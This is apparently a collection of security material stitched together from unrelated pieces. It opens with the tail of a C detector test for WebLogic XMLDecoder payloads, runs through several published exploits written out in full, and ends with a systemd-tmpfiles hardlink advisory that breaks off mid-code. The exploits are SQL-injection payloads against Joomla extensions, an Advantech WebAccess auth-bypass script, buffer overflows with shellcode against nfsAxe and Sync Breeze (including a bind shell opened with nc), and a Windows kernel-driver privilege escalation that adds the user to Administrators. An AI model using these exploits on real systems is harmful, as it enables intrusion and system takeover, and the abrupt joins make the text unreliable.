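    "<soapenv:Body><Register xmlns=\"http://docs.oasis-open.org/ws-tx/wscoor/2006/06\"/></soapenv:Body>"
    "</soapenv:Envelope>";

static const char EXPLOIT_SHAPED_BODY[] =
    "<soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\">"
    "<soapenv:Header>"
    "<work:WorkContext xmlns:work=\"http://bea.com/2004/06/soap/workarea/\">"
    "<java><void class=\"java.lang.ProcessBuilder\">"
    "<array class=\"java.lang.String\" length=\"3\">"
    "<void index=\"0\"><string>/bin/sh</string></void>"
    "<void index=\"1\"><string>-c</string></void>"
    "<void index=\"2\"><string>echo constructed-sample</string></void>"
    "</array><void method=\"start\"/></void></java>"
    "</work:WorkContext>"
    "</soapenv:Header><soapenv:Body/></soapenv:Envelope>";

static const char CALLBACK_SHAPED_BODY[] =
    "<soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\">"
    "<soapenv:Header>"
    "<work:WorkContext xmlns:work=\"http://bea.com/2004/06/soap/workarea/\">"
    "<java version=\"1.8\" class=\"java.beans.XMLDecoder\">"
    "<void id=\"url\" class=\"java.net.URL\"><string>http://example.invalid/check</string></void>"
    "<void idref=\"url\"><void id=\"stream\" method=\"openStream\"/></void>"
    "</java>"
    "</work:WorkContext>"
    "</soapenv:Header><soapenv:Body/></soapenv:Envelope>";

int main(void)
{
    printf("benign:   0x%x\n", wsat_body_indicators(BENIGN_BODY));
    printf("exploit:  0x%x\n", wsat_body_indicators(EXPLOIT_SHAPED_BODY));
    printf("callback: 0x%x\n", wsat_body_indicators(CALLBACK_SHAPED_BODY));
    return 0;
}
```

The bitmask is deliberately richer than a yes/no: `WSAT_JAVA_IN_WORKCONTEXT` alone already justifies blocking (WS-AT coordination has no business carrying serialised Java bean graphs), while the ProcessBuilder and URL bits tell an analyst whether the request was an execution attempt or a blind reachability probe like the module's disabled check.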
# # # # #
# Exploit Title: Joomla! Component CP Event Calendar 3.0.1 - SQL Injection
# Dork: N/A
# Date: 30.01.2018
# Vendor Homepage: http://www.joomlacalendars.com/
# Software Link: https://extensions.joomla.org/extensions/extension/calendars-a-events/events/cp-event-calendar/
# Version: 3.0.1
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: CVE-2018-6398
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows an attacker to inject sql commands....
#
# Proof of Concept:
#
# 1)
# http://localhost/[PATH]/index.php?option=com_cpeventcalendar&task=load&id=[SQL]
#
# %2d%31%20%20%2f%2a%21%30%36%36%36%36%55%4e%49%4f%4e%2a%2f%20%2f%2a%21%30%36%36%36%36%53%45%4c%45%43%54%2a%2f%20CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION())%2c%32%2c%33%2c%34%2c%35%2c%36%2c%37%2d%2d%20%2d
#
# Parameter: id (GET)
# Type: boolean-based blind
# Title: AND boolean-based blind - WHERE or HAVING clause
# Payload: option=com_cpeventcalendar&task=load&id=1 AND 6741=6741
#
# Type: error-based
# Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
# Payload: option=com_cpeventcalendar&task=load&id=1 AND (SELECT 7531 FROM(SELECT COUNT(*),CONCAT(0x716a707671,(SELECT (ELT(7531=7531,1))),0x717a6a7a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)
#
# Type: AND/OR time-based blind
# Title: MySQL <= 5.0.11 AND time-based blind (heavy query - comment)
# Payload: option=com_cpeventcalendar&task=load&id=1 AND 3954=BENCHMARK(5000000,MD5(0x4573626a))#
#
# Type: UNION query
# Title: Generic UNION query (NULL) - 7 columns
# Payload: option=com_cpeventcalendar&task=load&id=1 UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x716a707671,0x4a61716b6d59557a4f5a496f7676584d57444e514d4d78626d42546e786d79747350424271687555,0x717a6a7a71),NULL,NULL,NULL-- cJFi
#
# # # # #
#!/usr/bin/python2.7
# Exploit Title: Advantech WebAccess BWSCADARest Login Method SQL Injection Authentication Bypass Vulnerability
# Date: 01-13-2018
# Exploit Author: Chris Lyne (@lynerc)
# Vendor Homepage: www.advantech.com
# Software Link: http://advcloudfiles.advantech.com/web/Download/webaccess/8.0/AdvantechWebAccessUSANode8.0_20150816.exe
# Version: Advantech WebAccess 8.0-2015.08.16
# Tested on: Windows Server 2008 R2 Enterprise 64-bit
# CVE : CVE-2017-16716
# See Also: http://zerodayinitiative.com/advisories/ZDI-18-065/
# Notes:
#
# There are two service interfaces:
# 1) SOAP
# 2) REST
#
# This PoC targets REST
#
# The web services did not work out of the box, and a new website/app was created in IIS for testing.
# This issue was potentially due to the fact that testing was completed against a trial version.
# PoC may need slight tweaks depending on configuration of the web service.
#
# Original vulnerability was reported for more recent software version.
#
# This WebAccessAuthBypass class can be imported :-)
import sys, requests
from xml.etree import ElementTree

class WebAccessAuthBypass:
    def __init__(self, ip, port):
        self.ip = ip
        self.port = port
        self.base_url = "http://%s:%s/BWMobileService/BWScadaRest.svc/" % (ip, port)

    def convert_entities(self, s):
        return s.replace('&gt;', '>').replace('&lt;', '<') # convert html entities in response, for parsing

    def get_project_list(self):
        print 'Getting list of projects...'
        res = requests.get(self.base_url)
        projects = list()
        if res.status_code != 200:
            print 'Bad HTTP response...'
        else:
            if 'PROJECT' not in res.text:
                print 'No projects listed by service.'
            else:
                s = self.convert_entities(res.text)
                xml = ElementTree.fromstring(s)
                for project_list in xml:
                    for project in project_list:
                        name = project.get('NAME')
                        if name is not None:
                            projects.append(name)
        if len(projects) > 0:
            print 'Found the following projects: ' + str(projects)
            return projects
        else:
            return None

    # returns a token
    def login(self, project):
        # SQL Injection into the user parameter
        url = self.base_url + "Login/" + project + "/notadmin'%20or%20'x'%3D'x/nopass" # notadmin' or 'x'='x
        res = requests.get(url)
        token = None
        if res.status_code != 200:
            print 'Bad HTTP response...'
        else:
            if 'OK TOKEN' not in res.text:
                print 'No token returned by service.'
            else:
                s = self.convert_entities(res.text)
                xml = ElementTree.fromstring(s)
                if len(xml) > 0:
                    token = xml[0].get('TOKEN')
        return token

    # token returned can be used for more transactions
    def get_token(self):
        project_list = self.get_project_list()
        if not project_list:
            return None
        project = project_list[0] # might as well pick the first project
        token = self.login(project)
        return token

if __name__ == "__main__":
    ip = 'targetip'
    port = 'port#'
    bypass = WebAccessAuthBypass(ip, port)
    token = bypass.get_token()
    if token is not None:
        print 'Successfully got an authentication token: ' + token
    else:
        print 'Unsuccessful.'
#!/usr/bin/python
########################################################################################################
# Exploit Author: Miguel Mendez Z
# Exploit Title: LabF nfsAxe v3.7 - TFTP "Input Directory" Local Buffer Overflow
# Date: 29-01-2018
# Software: LabF nfsAxe
# Version: v3.7
# Vendor Homepage: http://www.labf.com
# Software Link: http://www.labf.com/download/nfsaxe.exe
# Tested on: Windows 7 x86
########################################################################################################
import struct
ropAlignEsp = (
"\x83\xEC\x58" #SUB ESP,58
"\x83\xEC\x58" #SUB ESP,58
"\x83\xEC\x58" #SUB ESP,58
"\x83\xEC\x58" #SUB ESP,58
"\x83\xEC\x10" #SUB ESP,10
"\xFF\xE4" #JMP ESP
)
scode = "\xB9\xEF\xEE\xEE\xEE" #MOV ECX,EEEEEEEF
scode += "\x81\xC1\x11\x11\x11\x11" #ADD ECX,11111111
scode += "\x51" #PUSH ECX
scode += "\x68\x31\x30\x73\x21" #PUSH 31307321
scode += "\x68\x73\x31\x6b\x72" #PUSH 73316b72
scode += "\x68\x5f\x62\x79\x5f" #PUSH 5f62795f
scode += "\x68\x70\x77\x6e\x64" #PUSH 70776e64
scode += "\x68\x42\x30\x66\x5f" #PUSH 4230665f
scode += "\x8B\xD4" #MOV EDX,ESP
scode += "\x48" #DEC EAX
scode += "\x50" #PUSH EAX
scode += "\x52" #PUSH EDX
scode += "\x52" #PUSH EDX
scode += "\x50" #PUSH EAX
scode += "\xBA\x11\xEA\x1A\x76" #MOV EDX,USER32.MessageBoxA() (Change)
scode += "\xFF\xD2" #CALL EDX
#--------------
scode += "\x33\xD2" #XOR EDX,EDX
scode += "\xB9\xEF\xEE\xEE\xEE" #MOV ECX,EEEEEEEF
scode += "\x81\xC1\x11\x11\x11\x11" #ADD ECX,11111111
scode += "\x51" #PUSH ECX
scode += "\x68\x63\x61\x6c\x63" #PUSH 0x63616c63
scode += "\x8B\xD4" #MOV EDX,ESP
scode += "\x52" #PUSH EDX
scode += "\x33\xD2" #XOR EDX,EDX
scode += "\xBA\x6F\xB1\x0F\x76" #MOV EDX,msvcrt.system - 0x760fb16f (Change)
scode += "\xFF\xD2" #CALL EDX
#--------------
scode += "\x50" #PUSH EAX
scode += "\xB8\xE2\xBB\xB5\x75" #MOV EAX,kernel32.ExitProcess() (Change)
scode += "\xFF\xD0" #CALL EAX
offset = "Host: "+scode+"A"*(1000-len(scode))+"\n"
offset += "File(s): "+"B"*33
offset += struct.pack("<L",0x75A6923D) #CALL ESP ADVAPI32.DLL
offset += "B"*5
offset += ropAlignEsp
offset += "B"*(1037-37+(len(ropAlignEsp)-5))+"\n"
offset += "Remote Dir y Local Dir: "+"C"*1000
payload = offset
print "Payload len: "+str(len(payload))
print "Shellcode len: "+str(len(scode))
file=open('tftpPoc.txt','w')
file.write(payload)
file.close()
/*
Exploit Title - System Shield AntiVirus & AntiSpyware Arbitrary Write Privilege Escalation
Date - 29th January 2018
Discovered by - Parvez Anwar (@parvezghh)
Vendor Homepage - http://www.iolo.com/
Tested Version - 5.0.0.136
Driver Version - 5.4.11.1 - amp.sys
Tested on OS - 64bit Windows 7 and Windows 10 (1709)
CVE ID - CVE-2018-5701
Vendor fix url -
Fixed Version - 0day
Fixed driver ver - 0day
Check blogpost for details:
https://www.greyhathacker.net/?p=1006
*/
#include <stdio.h>
#include <string.h>
#include <conio.h>
#include <windows.h>
#include <aclapi.h>

#pragma comment(lib,"advapi32.lib")

#define MSIEXECKEY "MACHINE\\SYSTEM\\CurrentControlSet\\services\\msiserver"
#define SystemHandleInformation 16
#define STATUS_INFO_LENGTH_MISMATCH ((NTSTATUS)0xc0000004L)

typedef unsigned __int64 QWORD;

typedef struct _SYSTEM_HANDLE_TABLE_ENTRY_INFO
{
    ULONG ProcessId;
    UCHAR ObjectTypeNumber;
    UCHAR Flags;
    USHORT Handle;
    QWORD Object;
    ACCESS_MASK GrantedAccess;
} SYSTEM_HANDLE, *PSYSTEM_HANDLE;

typedef struct _SYSTEM_HANDLE_INFORMATION
{
    ULONG NumberOfHandles;
    SYSTEM_HANDLE Handles[1];
} SYSTEM_HANDLE_INFORMATION, *PSYSTEM_HANDLE_INFORMATION;

typedef NTSTATUS (WINAPI *_NtQuerySystemInformation)(
    ULONG SystemInformationClass,
    PVOID SystemInformation,
    ULONG SystemInformationLength,
    PULONG ReturnLength);

// Forward declaration: RestorePermissions() calls this before its definition
int WriteToRegistry(char command[]);

// Looks up the kernel address of the current process token via the system handle table
QWORD TokenAddressCurrentProcess(HANDLE hProcess, DWORD MyProcessID)
{
    _NtQuerySystemInformation NtQuerySystemInformation;
    PSYSTEM_HANDLE_INFORMATION pSysHandleInfo = NULL;
    ULONG i;
    QWORD TokenAddress = 0;
    DWORD nSize = 4096;
    DWORD nReturn;
    HANDLE hToken;

    if (OpenProcessToken(hProcess, TOKEN_QUERY, &hToken) == FALSE)
    {
        printf("\n[-] OpenProcessToken() failed (%d)\n", GetLastError());
        return -1;
    }

    NtQuerySystemInformation = (_NtQuerySystemInformation)GetProcAddress(GetModuleHandle("ntdll.dll"), "NtQuerySystemInformation");
    if (!NtQuerySystemInformation)
    {
        printf("[-] Unable to resolve NtQuerySystemInformation\n\n");
        return -1;
    }

    // Grow the buffer until the whole handle table fits
    do
    {
        if (pSysHandleInfo)
            HeapFree(GetProcessHeap(), 0, pSysHandleInfo);
        nSize += 4096;
        pSysHandleInfo = (PSYSTEM_HANDLE_INFORMATION) HeapAlloc(GetProcessHeap(), 0, nSize);
    } while (NtQuerySystemInformation(SystemHandleInformation, pSysHandleInfo, nSize, &nReturn) == STATUS_INFO_LENGTH_MISMATCH);

    printf("\n[i] Current process id %d and token handle value %u", MyProcessID, (unsigned int)(ULONG_PTR)hToken);

    for (i = 0; i < pSysHandleInfo->NumberOfHandles; i++)
    {
        if (pSysHandleInfo->Handles[i].ProcessId == MyProcessID && pSysHandleInfo->Handles[i].Handle == (USHORT)(ULONG_PTR)hToken)
        {
            TokenAddress = pSysHandleInfo->Handles[i].Object;
        }
    }

    HeapFree(GetProcessHeap(), 0, pSysHandleInfo);
    CloseHandle(hToken);
    return TokenAddress;
}

int TakeOwnership()
{
    HANDLE token;
    PTOKEN_USER user = NULL;
    PACL pACL = NULL;
    EXPLICIT_ACCESS ea;
    DWORD dwLengthNeeded;

    if (!OpenProcessToken(GetCurrentProcess(), TOKEN_ALL_ACCESS, &token))
    {
        printf("\n[-] OpenProcessToken failed %d\n\n", GetLastError());
        ExitProcess(1);
    }
    printf("\n[+] OpenProcessToken successful");

    if (!GetTokenInformation(token, TokenUser, NULL, 0, &dwLengthNeeded) && GetLastError() != ERROR_INSUFFICIENT_BUFFER)
    {
        printf("\n[-] Failed to initialize GetTokenInformation %d\n\n", GetLastError());
        ExitProcess(1);
    }

    user = (PTOKEN_USER)LocalAlloc(0, dwLengthNeeded);
    if (!GetTokenInformation(token, TokenUser, user, dwLengthNeeded, &dwLengthNeeded))
    {
        printf("\n[-] GetTokenInformation failed %d\n\n", GetLastError());
        ExitProcess(1);
    }

    ZeroMemory(&ea, sizeof(EXPLICIT_ACCESS));

    // build DACL
    ea.grfAccessPermissions = KEY_ALL_ACCESS;
    ea.grfAccessMode = GRANT_ACCESS;
    ea.grfInheritance = SUB_CONTAINERS_AND_OBJECTS_INHERIT;
    ea.Trustee.TrusteeForm = TRUSTEE_IS_SID;
    ea.Trustee.TrusteeType = TRUSTEE_IS_USER;
    ea.Trustee.ptstrName = (LPTSTR)user->User.Sid;

    if (SetEntriesInAcl(1, &ea, NULL, &pACL) != ERROR_SUCCESS)
    {
        printf("\n[-] SetEntriesInAcl failure\n\n");
        ExitProcess(1);
    }
    printf("\n[+] SetEntriesInAcl successful");

    // Take ownership
    if (SetNamedSecurityInfo(MSIEXECKEY, SE_REGISTRY_KEY, OWNER_SECURITY_INFORMATION, user->User.Sid, NULL, NULL, NULL) != ERROR_SUCCESS)
    {
        printf("\n[-] Failed to obtain the object's ownership %d\n\n", GetLastError());
        ExitProcess(1);
    }
    printf("\n[+] Ownership '%s' successful", MSIEXECKEY);

    // Modify DACL
    if (SetNamedSecurityInfo(MSIEXECKEY, SE_REGISTRY_KEY, DACL_SECURITY_INFORMATION, NULL, NULL, pACL, NULL) != ERROR_SUCCESS)
    {
        printf("\n[-] Failed to modify the object's DACL %d\n\n", GetLastError());
        ExitProcess(1);
    }
    printf("\n[+] Object's DACL successfully modified");

    LocalFree(pACL);
    CloseHandle(token);
    return 0;
}

int RestorePermissions()
{
    PACL pOldDACL = NULL;
    PSID pSIDAdmin = NULL;
    SID_IDENTIFIER_AUTHORITY SIDAuthNT = SECURITY_NT_AUTHORITY;

    printf("\n[*] Restoring all permissions and value");

    // Restore registry value
    WriteToRegistry("%systemroot%\\system32\\msiexec.exe /V");

    // Sid for the BUILTIN\Administrators group
    if (!AllocateAndInitializeSid(&SIDAuthNT, 2, SECURITY_BUILTIN_DOMAIN_RID, DOMAIN_ALIAS_RID_ADMINS, 0, 0, 0, 0, 0, 0, &pSIDAdmin))
    {
        printf("\nAllocateAndInitializeSid failed %d\n\n", GetLastError());
        ExitProcess(1);
    }

    // Restore key ownership
    if (SetNamedSecurityInfo(MSIEXECKEY, SE_REGISTRY_KEY, OWNER_SECURITY_INFORMATION, pSIDAdmin, NULL, NULL, NULL) != ERROR_SUCCESS)
    {
        printf("\n[-] Failed to restore the object's ownership %d\n\n", GetLastError());
        ExitProcess(1);
    }
    printf("\n[+] Object's ownership successfully restored");

    // Take copy of parent key
    if (GetNamedSecurityInfo("MACHINE\\SYSTEM\\CurrentControlSet\\Services", SE_REGISTRY_KEY, DACL_SECURITY_INFORMATION, NULL, NULL, &pOldDACL, NULL, NULL) != ERROR_SUCCESS)
    {
        printf("\n[-] Failed to copy parent key object's DACL %d\n\n", GetLastError());
        ExitProcess(1);
    }
    printf("\n[+] Parent key object's DACL successfully saved");

    // Restore key permissions
    if (SetNamedSecurityInfo(MSIEXECKEY, SE_REGISTRY_KEY, DACL_SECURITY_INFORMATION | UNPROTECTED_DACL_SECURITY_INFORMATION, NULL, NULL, pOldDACL, NULL) != ERROR_SUCCESS)
    {
        printf("\n[-] Failed to restore the object's DACL %d\n\n", GetLastError());
        ExitProcess(1);
    }
    printf("\n[+] Object's DACL successfully restored");

    FreeSid(pSIDAdmin);
    return 0;
}

int WriteToRegistry(char command[])
{
    HKEY hkeyhandle;

    if (RegOpenKeyEx(HKEY_LOCAL_MACHINE, "SYSTEM\\CurrentControlSet\\services\\msiserver", 0, KEY_WRITE, &hkeyhandle) != ERROR_SUCCESS)
    {
        printf("\n[-] Registry key failed to open %d\n\n", GetLastError());
        ExitProcess(1);
    }

    if (RegSetValueEx(hkeyhandle, "ImagePath", 0, REG_EXPAND_SZ, (LPBYTE) command, strlen(command)) != ERROR_SUCCESS)
    {
        printf("\n[-] Registry value failed to write %d\n\n", GetLastError());
        ExitProcess(1);
    }
    printf("\n[+] Registry key opened and value modified");

    RegCloseKey(hkeyhandle);
    return 0;
}

int TriggerCommand()
{
    STARTUPINFO si;
    PROCESS_INFORMATION pi;

    ZeroMemory(&si, sizeof(si));
    ZeroMemory(&pi, sizeof(pi));
    si.cb = sizeof(si);

    if (!CreateProcess(NULL, "c:\\windows\\system32\\msiexec.exe /i poc.msi /quiet", NULL, NULL, FALSE, CREATE_NO_WINDOW, NULL, NULL, &si, &pi))
    {
        printf("\n[-] CreateProcess failed %d", GetLastError());
        ExitProcess(1);
    }
    printf("\n[+] c:\\windows\\system32\\msiexec.exe launched");
    printf("\n[i] Account should now be in the local administrators group");

    CloseHandle(pi.hThread);
    CloseHandle(pi.hProcess);
    return 0;
}

int main(int argc, char *argv[])
{
    QWORD TokenAddressTarget;
    QWORD SepPrivilegesOffset = 0x40;
    QWORD TokenAddress;
    HANDLE hDevice;
    char devhandle[MAX_PATH];
    DWORD dwRetBytes = 0;
    QWORD inbuffer1[3] = {0};
    QWORD inbuffer2[3] = {0};
    QWORD ptrbuffer[1] = {0};   // QWORD4 - Has to be 0 for arbitrary write value to be 0xfffffffe
    DWORD currentusersize;
    char currentuser[100];
    char netcommand[MAX_PATH];

    printf("-------------------------------------------------------------------------------\n");
    printf(" System Shield AntiVirus & AntiSpyware (amp.sys) Arbitrary Write EoP Exploit \n");
    printf(" Tested on 64bit Windows 7 / Windows 10 (1709) \n");
    printf("-------------------------------------------------------------------------------\n");

    TokenAddress = TokenAddressCurrentProcess(GetCurrentProcess(), GetCurrentProcessId());
    printf("\n[i] Address of current process token 0x%p", (PVOID)(ULONG_PTR)TokenAddress);

    TokenAddressTarget = TokenAddress + SepPrivilegesOffset;
    printf("\n[i] Address of _SEP_TOKEN_PRIVILEGES 0x%p will be overwritten", (PVOID)(ULONG_PTR)TokenAddressTarget);

    inbuffer1[0] = 0x8;                            // QWORD1 - Cannot be more than 8. Also different values (<9) calculates to different sub calls
    inbuffer1[1] = (QWORD)(ULONG_PTR)ptrbuffer;    // QWORD2 - Address used for read and write
    inbuffer1[2] = TokenAddressTarget+1;           // QWORD3 - Arbitrary write address !!!

    inbuffer2[0] = 0x8;
    inbuffer2[1] = (QWORD)(ULONG_PTR)ptrbuffer;
    inbuffer2[2] = TokenAddressTarget+9;

    sprintf(devhandle, "\\\\.\\%s", "amp");
    hDevice = CreateFile(devhandle, GENERIC_READ | GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_EXISTING , 0, NULL);
    if(hDevice == INVALID_HANDLE_VALUE)
    {
        printf("\n[-] Open %s device failed\n\n", devhandle);
        return -1;
    }
    else
    {
        printf("\n[+] Open %s device successful", devhandle);
    }

    printf("\n[~] Press any key to continue . . .\n");
    getch();

    DeviceIoControl(hDevice, 0x00226003, inbuffer1, sizeof(inbuffer1), NULL, 0, &dwRetBytes, NULL);
    DeviceIoControl(hDevice, 0x00226003, inbuffer2, sizeof(inbuffer2), NULL, 0, &dwRetBytes, NULL);
    printf("[+] Overwritten _SEP_TOKEN_PRIVILEGES bits\n");
    CloseHandle(hDevice);

    currentusersize = sizeof(currentuser);
    if (!GetUserName(currentuser, &currentusersize))
    {
        printf("\n[-] Failed to obtain current username: %d\n\n", GetLastError());
        return -1;
    }
    printf("[*] Adding current user '%s' account to the local administrators group", currentuser);
    sprintf(netcommand, "net localgroup Administrators %s /add", currentuser);

    TakeOwnership();
    WriteToRegistry(netcommand);
    TriggerCommand();
    Sleep(1000);
    RestorePermissions();

    printf("\n\n");
    return 0;
}
# # # # #
# Exploit Title: Joomla! Component Picture Calendar for Joomla 3.1.4 - Directory Traversal
# Dork: N/A
# Date: 30.01.2018
# Vendor Homepage: http://www.joomlacalendars.com/
# Software Link: https://extensions.joomla.org/extensions/extension/calendars-a-events/events/picture-calendar-for-joomla/
# Version: 3.1.4
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: CVE-2018-6397
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# Directory Traversal...
#
# Proof of Concept:
#
# 1)
# http://localhost/[PATH]/list.php?folder=[DIRECTORY]
#
# # # # #
# Exploit Title: Sync Breeze Enterprise v10.4.18 Server - Unauthenticated Remote Buffer Overflow SEH
# Date: 29/01/2018
# Exploit Author: Daniel Teixeira
# Vendor Homepage: http://www.syncbreeze.com
# Software Link: http://www.syncbreeze.com/setups/syncbreezeent_setup_v10.4.18.exe
# Version: 10.4.18
# Tested on: Windows 7 x86
from struct import pack
from os import system
from sys import exit
from time import sleep
import socket
port = 9121
host = "172.16.40.148"
# msfvenom -a x86 --platform windows -p windows/shell_bind_tcp -f py -b '\x00\x02\x0a\x0d\xf8\xfd' --var-name shellcode
shellcode = ""
shellcode += "\xba\x71\x6d\xbf\xc8\xd9\xc0\xd9\x74\x24\xf4\x5d"
shellcode += "\x29\xc9\xb1\x53\x83\xed\xfc\x31\x55\x0e\x03\x24"
shellcode += "\x63\x5d\x3d\x3a\x93\x23\xbe\xc2\x64\x44\x36\x27"
shellcode += "\x55\x44\x2c\x2c\xc6\x74\x26\x60\xeb\xff\x6a\x90"
shellcode += "\x78\x8d\xa2\x97\xc9\x38\x95\x96\xca\x11\xe5\xb9"
shellcode += "\x48\x68\x3a\x19\x70\xa3\x4f\x58\xb5\xde\xa2\x08"
shellcode += "\x6e\x94\x11\xbc\x1b\xe0\xa9\x37\x57\xe4\xa9\xa4"
shellcode += "\x20\x07\x9b\x7b\x3a\x5e\x3b\x7a\xef\xea\x72\x64"
shellcode += "\xec\xd7\xcd\x1f\xc6\xac\xcf\xc9\x16\x4c\x63\x34"
shellcode += "\x97\xbf\x7d\x71\x10\x20\x08\x8b\x62\xdd\x0b\x48"
shellcode += "\x18\x39\x99\x4a\xba\xca\x39\xb6\x3a\x1e\xdf\x3d"
shellcode += "\x30\xeb\xab\x19\x55\xea\x78\x12\x61\x67\x7f\xf4"
shellcode += "\xe3\x33\xa4\xd0\xa8\xe0\xc5\x41\x15\x46\xf9\x91"
shellcode += "\xf6\x37\x5f\xda\x1b\x23\xd2\x81\x73\x80\xdf\x39"
shellcode += "\x84\x8e\x68\x4a\xb6\x11\xc3\xc4\xfa\xda\xcd\x13"
shellcode += "\xfc\xf0\xaa\x8b\x03\xfb\xca\x82\xc7\xaf\x9a\xbc"
shellcode += "\xee\xcf\x70\x3c\x0e\x1a\xec\x34\xa9\xf5\x13\xb9"
shellcode += "\x09\xa6\x93\x11\xe2\xac\x1b\x4e\x12\xcf\xf1\xe7"
shellcode += "\xbb\x32\xfa\x16\x60\xba\x1c\x72\x88\xea\xb7\xea"
shellcode += "\x6a\xc9\x0f\x8d\x95\x3b\x38\x39\xdd\x2d\xff\x46"
shellcode += "\xde\x7b\x57\xd0\x55\x68\x63\xc1\x69\xa5\xc3\x96"
shellcode += "\xfe\x33\x82\xd5\x9f\x44\x8f\x8d\x3c\xd6\x54\x4d"
shellcode += "\x4a\xcb\xc2\x1a\x1b\x3d\x1b\xce\xb1\x64\xb5\xec"
shellcode += "\x4b\xf0\xfe\xb4\x97\xc1\x01\x35\x55\x7d\x26\x25"
shellcode += "\xa3\x7e\x62\x11\x7b\x29\x3c\xcf\x3d\x83\x8e\xb9"
shellcode += "\x97\x78\x59\x2d\x61\xb3\x5a\x2b\x6e\x9e\x2c\xd3"
shellcode += "\xdf\x77\x69\xec\xd0\x1f\x7d\x95\x0c\x80\x82\x4c"
shellcode += "\x95\xb0\xc8\xcc\xbc\x58\x95\x85\xfc\x04\x26\x70"
shellcode += "\xc2\x30\xa5\x70\xbb\xc6\xb5\xf1\xbe\x83\x71\xea"
shellcode += "\xb2\x9c\x17\x0c\x60\x9c\x3d"
payload = "A" * 124 # offset
payload += "\x90\x09\xeb\x05" # jmp over seh return value
payload += "\x1b\x5c\x01\x10" # 0x10015c1b : pop edi # pop esi # ret 0x04 | ascii {PAGE_EXECUTE_READ} [libspp.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v-1.0- (C:\Program Files\Sync Breeze Enterprise\bin\libspp.dll)
payload += "\x90" * 10
payload += "\x83\xc4\x64" * 20 # metasm > add esp,100
payload += "\xff\xe4" # metasm > jmp esp
payload += "\x90" * (1000 - len(payload) - len(shellcode))
payload += shellcode
header = "\x75\x19\xba\xab"
header += "\x03\x00\x00\x00"
header += "\x00\x40\x00\x00"
header += pack('<I', len(payload))
header += pack('<I', len(payload))
header += pack('<I', ord(payload[-1]))
packet = header
packet += payload
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
    print "[*] Testing connection to target %s:%s" %(host,port)
    s.connect((host, port))
except:
    print "[-] Unable to communicate to target %s:%s" %(host,port)
    exit()
s.send(packet)
print "[*] Payload Sent.."
print "[*] Connecting to bind shell %s:4444 .." %host
sleep(5)
system("nc %s 4444"%host)
Product: systemd (systemd-tmpfiles)
Versions-affected: 236 and earlier
Author: Michael Orlitzky
Fixed-in: commit 5579f85, version 237
Bug-report: https://github.com/systemd/systemd/issues/7736
Acknowledgments: Lennart Poettering who, instead of calling me an idiot
for not realizing that systemd enables fs.protected_hardlinks by
default, went out of his way to harden the non-default configuration.
== Summary ==
Before version 237, the systemd-tmpfiles program will change the
permissions and ownership of hard links. If the administrator disables
the fs.protected_hardlinks sysctl, then an attacker can create hard
links to sensitive files and subvert systemd-tmpfiles, particularly
with "Z" type entries.
Systemd as PID 1 with the default fs.protected_hardlinks=1 is safe.
== Details ==
When running as PID 1, systemd enables the fs.protected_hardlinks
sysctl by default; that prevents an attacker from creating hard links
to files that he can't write to. If, however, the administrator should
decide to disable that sysctl, then hard links may be created to any
file (on the same filesystem).
Before version 237, the systemd-tmpfiles program will voluntarily
change the permissions and ownership of a hard link, and that is
exploitable in a few scenarios. The most problematic and easiest to
exploit is the "Z" type tmpfiles.d entry, which changes ownership and
permissions recursively. For example, consider the following
tmpfiles.d entries:
d /var/lib/systemd-exploit-recursive 0755 mjo mjo
Z /var/lib/systemd-exploit-recursive 0755 mjo mjo
Whenever systemd-tmpfiles is run, those entries make mjo the owner of
everything under and including /var/lib/systemd-exploit-recursive. After
the first run, mjo can create a hard link inside that directory pointing
to /etc/passwd. The next run (after a reboot, for example) changes the
ownership of /etc/passwd.
A proof-of-concept can be run from the systemd source tree, using
either two separate terminals or sudo:
root # sysctl -w fs.protected_hardlinks=0
root # sysctl -w kernel.grsecurity.linking_restrictions=0
root # ./build/systemd-tmpfiles --create
mjo $ ln /etc/passwd /var/lib/systemd-exploit-recursive/x
root # ./build/systemd-tmpfiles --create
mjo $ /bin/ls -l /etc/passwd
-rwxr-xr-x 2 mjo mjo 1504 Dec 20 14:27 /etc/passwd
More elaborate exploits are possible, and not only the "Z" type is
vulnerable.
== Resolution ==
The recursive change of ownership/permissions does not seem to be safely
doable without fs.protected_hardlinks enabled.
In version 237 and later, systemd-tmpfiles calls fstatat() immediately
after obtaining a file descriptor from open():
fd = open(path, O_NOFOLLOW|O_CLOEXEC|O_PATH);
if (fd < 0) {
...
}
if (fstatat(fd, "", &st, AT_EMPTY_PATH) < 0)
The st->st_nlink field is then checked to determine whether or not fd
describes a hard link. If it does, the ownership/permissions are not
changed, and an error is displayed:
if (hardlink_vulnerable(&st)) {
log_error("Refusing to set permissions on hardlink...", path);
return -EPERM;
}
There is still a tiny window between open() and fstatat() where the
attacker can fool this countermeasure by removing an existing hard
link to, say, /etc/passwd. In that case, st->st_nlink will be 1, but
fd still references /etc/passwd. The attack succeeds, but is much
harder to do, and the window is as narrow as possible. More to the
point, it seems unavoidable when implementing the tmpfiles.d
specification.
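The open()/fstatat()/st_nlink check described above, as an added example in C (not systemd's code): chmod_refusing_hardlinks() follows the version-237 pattern, and run_demo() builds a constructed temp-directory scenario in which a plain path-based chmod (the pre-237 behaviour) changes the original file through a hard link while the checked version refuses. hardlink_vulnerable() is a hypothetical helper modelled on the one quoted above; the chmod through /proc/self/fd and the Linux-only O_PATH/AT_EMPTY_PATH flags assume a Linux host.

```c
#define _GNU_SOURCE
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/stat.h>
#include <unistd.h>

/* Linux-only flags; fallback values in case a libc header was already
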